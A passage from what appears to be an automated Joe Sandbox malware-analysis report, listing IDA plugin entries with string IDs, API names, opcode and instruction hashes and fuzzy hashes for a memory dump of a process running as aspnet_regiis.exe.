                                                                                                                                                                                                                                            • String ID: %;TK$%;TK$2IC$eRC$rTC
                                                                                                                                                                                                                                            • API String ID: 0-2023983429
                                                                                                                                                                                                                                            • Opcode ID: 8c4d0dd0bb4e335af14026c10ab2b6daef9fc28c81e8a2c4d97660f2654ab88a
                                                                                                                                                                                                                                            • Instruction ID: 8646c76c3e9c543cd7cfa2cb4d0306be3efdd6bf7ba6ee5451e32e436268b484
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c4d0dd0bb4e335af14026c10ab2b6daef9fc28c81e8a2c4d97660f2654ab88a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C962CA36609201CFC708CF29E4A065AB7F2FFC9314F19996DD49A877A1C734E945CB8A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: %;TK$%;TK$2IC$eRC$rTC
                                                                                                                                                                                                                                            • API String ID: 0-2023983429
                                                                                                                                                                                                                                            • Opcode ID: e6c72382dc6ff381ef38823e030af26c299d54f7feba665adaccc50a7d80a0b2
                                                                                                                                                                                                                                            • Instruction ID: 34a1d62e8afedcb2d2646c3ee3fa8f919e53b752d855a6416eddabd52971a3d0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6c72382dc6ff381ef38823e030af26c299d54f7feba665adaccc50a7d80a0b2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6652CB36609200CFD708CF29D4A0A5AB7F2FFC9314F19996DD49A877A1C734E855CB8A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: >=$A-Q+$onih$pUTK$pUTK
                                                                                                                                                                                                                                            • API String ID: 0-3057816515
                                                                                                                                                                                                                                            • Opcode ID: a1f3518dc4d6907dd62553a3efd01ce5fecfe3e629b692580af0fb814b53192e
                                                                                                                                                                                                                                            • Instruction ID: 59533cf914e7259a3e5c13bf49514f8814af62cbbaaddc55c6068720b5fa406b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1f3518dc4d6907dd62553a3efd01ce5fecfe3e629b692580af0fb814b53192e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF157B06083418BD318CF14C490B6BBBF2FF95355F14886DE4858B3A2D779D989CB9A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: eRC$rTC$|MJK
                                                                                                                                                                                                                                            • API String ID: 0-2000110321
                                                                                                                                                                                                                                            • Opcode ID: e8d493d9cc7083a299f3e0a09b95332799d38c5ae94ca71a41086a858a494b67
                                                                                                                                                                                                                                            • Instruction ID: c553bb1d6398e655bdd8dac4bd8a7793095c62bb97b91aaec156035c35538053
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8d493d9cc7083a299f3e0a09b95332799d38c5ae94ca71a41086a858a494b67
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6512CD36609201CFD708CF29D4A066AB7E2FFC9314F09A96DE98687391C734E955CF86
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ":C$@$gY<S
                                                                                                                                                                                                                                            • API String ID: 0-4039707082
                                                                                                                                                                                                                                            • Opcode ID: 6c86fb9bb430f18f0bfe7ed0aa4b56a24194281bb1a658ee961372eebc24f845
                                                                                                                                                                                                                                            • Instruction ID: c59aa95933c59a739c8e697774b8ebfb49a9ef6b297764a76b028f71b340c182
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c86fb9bb430f18f0bfe7ed0aa4b56a24194281bb1a658ee961372eebc24f845
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DED143756083419FD314CF19C59072BBBE2EBCA705F14A92EE88987350C778DD0ADB8A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID: onih
                                                                                                                                                                                                                                            • API String ID: 1279760036-4145997799
                                                                                                                                                                                                                                            • Opcode ID: f0ea55b18c283ca31c958ba430629de48f997c0908c745dabafc03177b01ccca
                                                                                                                                                                                                                                            • Instruction ID: 8c954cbcf73d0492fd081a8839adbe0fb51ebf1442e0e8dc1d9693bb48fdaa82
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0ea55b18c283ca31c958ba430629de48f997c0908c745dabafc03177b01ccca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1612D472908311DBD7109F24D88176A73E5EF99354F08193EE686973A1EB38DC84CB8B
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00438740,00000000,00000001,00438730), ref: 0041A429
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 542301482-0
                                                                                                                                                                                                                                            • Opcode ID: f64e1231aef87ccf6af7af34e496503bf6dbc2264c56c27e1af9dac0c8093621
                                                                                                                                                                                                                                            • Instruction ID: ed3ca0c26924fb8313f58f028ea88dfcdcea309d91a3f8ccbb980e2dfc6bfde8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f64e1231aef87ccf6af7af34e496503bf6dbc2264c56c27e1af9dac0c8093621
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 835113B06052109BD7209B24CC86BA373B5EFA5328F18452DE986CB3D0F779E894C75A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: "
                                                                                                                                                                                                                                            • API String ID: 0-123907689
                                                                                                                                                                                                                                            • Opcode ID: 3f7daec6c96696e3885f5c2d8b9b6d7a5c243ab2131458cbfa3e462702648435
                                                                                                                                                                                                                                            • Instruction ID: 4e8cb7955c538a151d1c6c5859234796db08d44d3a7ced8399a3f058463164dc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f7daec6c96696e3885f5c2d8b9b6d7a5c243ab2131458cbfa3e462702648435
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AC149B2B083217BC7258E24E55076BB7D5AF84350F888A2FE49587382D7BCEC45C796
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Bmrs
                                                                                                                                                                                                                                            • API String ID: 0-2220043307
                                                                                                                                                                                                                                            • Opcode ID: aba28dc23b312c8629889755e3df5a995b8e20b2e54b8e27063423c6dc8755bc
                                                                                                                                                                                                                                            • Instruction ID: 626e7a905781cf5e3153b27d3cbaa51cedd711b552ff38660d9267233066ba15
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aba28dc23b312c8629889755e3df5a995b8e20b2e54b8e27063423c6dc8755bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FB1CE719043008BC724CF18C8917A7B3F1EF95364F18861EE8958B391EB78DD85C7AA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: lx
                                                                                                                                                                                                                                            • API String ID: 0-3595554650
                                                                                                                                                                                                                                            • Opcode ID: 5b0d96671900dfb8da1243459af1e2c7f9672e17dc29d198106878dc659f76ff
                                                                                                                                                                                                                                            • Instruction ID: 99d41ff2d2e6b22daf2bee45268baed169b128bf1315e11f152d1e7c05295f47
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b0d96671900dfb8da1243459af1e2c7f9672e17dc29d198106878dc659f76ff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABC128745083808BD324EF29C484B9FFBF1EF96304F14892DE5C997351E77A98858B5A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 2B0B8B
                                                                                                                                                                                                                                            • API String ID: 0-3594203492
                                                                                                                                                                                                                                            • Opcode ID: ae3fe04c10feea808a8ee7b30b9125075b8575fde3b53b78afe6618ff647c64e
                                                                                                                                                                                                                                            • Instruction ID: 87dbe57898fde06504e3b188ffa31b763742dfa13272a8125331c1c396921eca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae3fe04c10feea808a8ee7b30b9125075b8575fde3b53b78afe6618ff647c64e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1C19D716083518FC314CF29D89062BF7E2BBC9314F558A6EE89997392C779DC02CB96
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                                                                                                            • Opcode ID: 86e41fdd573f2c77ea97b072a64e95b3cb264418101b62054270d0ba596a8a81
                                                                                                                                                                                                                                            • Instruction ID: c089de14d7646bb64245ba4cd4c2f8a58595428c53dde4ba53eccf160720983d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86e41fdd573f2c77ea97b072a64e95b3cb264418101b62054270d0ba596a8a81
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2471867150D3918BD3119F2AC09070BFFE0AF967A4F08499DE8C46B392C379E945CB9A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: xM
                                                                                                                                                                                                                                            • API String ID: 0-2924665900
                                                                                                                                                                                                                                            • Opcode ID: f5652710800b0a68c3e0c4c18f040c0ff23ef9eb6731fc90fd432da870cbdef8
                                                                                                                                                                                                                                            • Instruction ID: 84becae86956912075c4f08c43772baebf82e0cc1f8a3d4f828148a7a578b939
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5652710800b0a68c3e0c4c18f040c0ff23ef9eb6731fc90fd432da870cbdef8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 197126709083848BD3B5CF14C5857DBB7E6EF89300F048D2DE98887291E7B99999CB57
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: |QPS
                                                                                                                                                                                                                                            • API String ID: 0-621468069
                                                                                                                                                                                                                                            • Opcode ID: 23b0b5655f3be91ae77da4ba8f4e049d66fea65f3cd49e3dcdaaeb1d47e65e40
                                                                                                                                                                                                                                            • Instruction ID: 35871aeb178df8561458f761d95a1951bef747746e18cfb19a3a7fa4357483d6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23b0b5655f3be91ae77da4ba8f4e049d66fea65f3cd49e3dcdaaeb1d47e65e40
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE6123B05183419BD310DF19C49066BBBF1FF86794F108A1DF8E99B390DB78D9418B9A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: onih
                                                                                                                                                                                                                                            • API String ID: 0-4145997799
                                                                                                                                                                                                                                            • Opcode ID: af7ccdb1b1450c8b5a996fc0e031f56998895535806fe3ff0136f299f80acce3
                                                                                                                                                                                                                                            • Instruction ID: 7707ab0250a0cc5023ab65f5c11c67ab0f8dd374d7713762664de224cb00b08c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af7ccdb1b1450c8b5a996fc0e031f56998895535806fe3ff0136f299f80acce3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E51CB35618310ABC718CF14E661B6BB3E2FF89704F04892DE98597251C3B9EC61CBCA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: /.)(
                                                                                                                                                                                                                                            • API String ID: 0-2587180175
                                                                                                                                                                                                                                            • Opcode ID: 8a467202108252d3a037469610e6e76b27d7b8381afc4679fa91345188b919a2
                                                                                                                                                                                                                                            • Instruction ID: 59dc8c4e732b59f322d612cb587a7b6cb6d9920b254b192447bf55da004168de
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a467202108252d3a037469610e6e76b27d7b8381afc4679fa91345188b919a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD1148799083918BD328DF11D4A076BB7A2BBC6304F105A2EE88627345C778D9458BCA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4514806d94bbd0892f546e6e97d907cd1ceb4d2aaa9c7d3d3fcd5944376383de
                                                                                                                                                                                                                                            • Instruction ID: a3ee799a2a52668f70cadab07ed2f0ab167f8ce785c210a76ac9e6b172f293e1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4514806d94bbd0892f546e6e97d907cd1ceb4d2aaa9c7d3d3fcd5944376383de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5752BB716087418FC725CF29C08026BFBE2BF98314F188A7EE5CAA7791D739A945CB45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 73e4c717c715894491fc0121e26296cc3a19ef0e50def314c112da8f5aee08bc
                                                                                                                                                                                                                                            • Instruction ID: 318dbbe5c3c440b1d9ff2ffbc90e0d1b6799ac0d41178395f7e48066cab86664
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73e4c717c715894491fc0121e26296cc3a19ef0e50def314c112da8f5aee08bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23F1F0B15083818FD310CF29D4906ABBBE1AF85304F14897EF8D597392D738D94ACB56
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ea5483d2965f36282b100a6a75860c07ab3ac3d2b8535f027f440fde816b297e
                                                                                                                                                                                                                                            • Instruction ID: 1ea1cfdae431a8f6c6bae6a27309291cd432dd6a4841f80e9c4e2ce46143d4f5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea5483d2965f36282b100a6a75860c07ab3ac3d2b8535f027f440fde816b297e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4C1ACB0204B418FD724CF29D891667B7E2BF95308F448A6ED4D787AA2D738F445CB89
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f386fccd83e4483b5975780097bd55688f7d7a7ce6b51af7f885751c41eb321f
                                                                                                                                                                                                                                            • Instruction ID: abbf81b3d754f31e34f924608b492cb332a11725bcd663386c21e8c888a3debf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f386fccd83e4483b5975780097bd55688f7d7a7ce6b51af7f885751c41eb321f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CB1BC719083409FD724CF64C880B6BBBE5EF95314F044D2EF585972A1E7B8E894CB9A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                            • Opcode ID: f139de566dcf2679f5133bd349f38fd98b8eef1a412cfcea8eed6b710ed12751
                                                                                                                                                                                                                                            • Instruction ID: 3f231d7190a26e49b31212793c48f82ce648d3f1cd25ef3ec7ead9657b2bd5bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f139de566dcf2679f5133bd349f38fd98b8eef1a412cfcea8eed6b710ed12751
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2951D2329083119BC710DF29C98075BB7E2EB99754F15992EE8C4A7351C3B8EC418BD6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 233cd55c648f4d254ce9cecbbc777287911d262ce327d6dd6a1358df7f1ab2ff
                                                                                                                                                                                                                                            • Instruction ID: 2335975ccd580023cdb2ac1c5d1beee1d69193312933bb5fa4aa97a82008cd5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 233cd55c648f4d254ce9cecbbc777287911d262ce327d6dd6a1358df7f1ab2ff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A93180705083028AD308EF15C48166BBBF2EFD5395F14D82EE4C983662E738D9C6CB5A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f7b0eccaca27b1809ea973b6372cbef4eb7e0da299170cd0f6124d2e85a8af19
                                                                                                                                                                                                                                            • Instruction ID: f7ca88c83ca6210f396225cf550bda2bc9179d4f1c3ea982e522422b10b1c278
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7b0eccaca27b1809ea973b6372cbef4eb7e0da299170cd0f6124d2e85a8af19
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 914185B06483518FE724CF14C8906ABBBF2EFD6348F109A2DE4D51B390D7799541CB8A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4d99b314886ab2986f715da611fd35a593e4ca420b23a379526670338e061fae
                                                                                                                                                                                                                                            • Instruction ID: 17f1b6aec8faf3233144ef1e4475231e9a9e169c21de215b3981dc6aa0a744d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d99b314886ab2986f715da611fd35a593e4ca420b23a379526670338e061fae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A21FF3660C2018BC308DF10D4E0A3BB3B2EF9A314F144A2DD5C203361C779AC91CB8A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                            • Instruction ID: 25bb615b4cf8dbcf6efc7e43bd79b1e58ad27a5becd44600948a3e0d6f198aae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC112933B041E40EC3128D3C9450565BFE34A93334B9D839AF4B99B2DAD7269D8A8399
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 42784f74bb6154e2fe65c69d3659ab9ac7e66f7ab3f39823d095af59e7ad56a8
                                                                                                                                                                                                                                            • Instruction ID: 4bd636a16873de271644ab178c6188ec72af9aea7b8ae486eb2598b424c08e08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42784f74bb6154e2fe65c69d3659ab9ac7e66f7ab3f39823d095af59e7ad56a8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E901B5F170072167D720AE51E6C1F37F2A86F90708F18053EEA445B341DBB9EC25C699
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
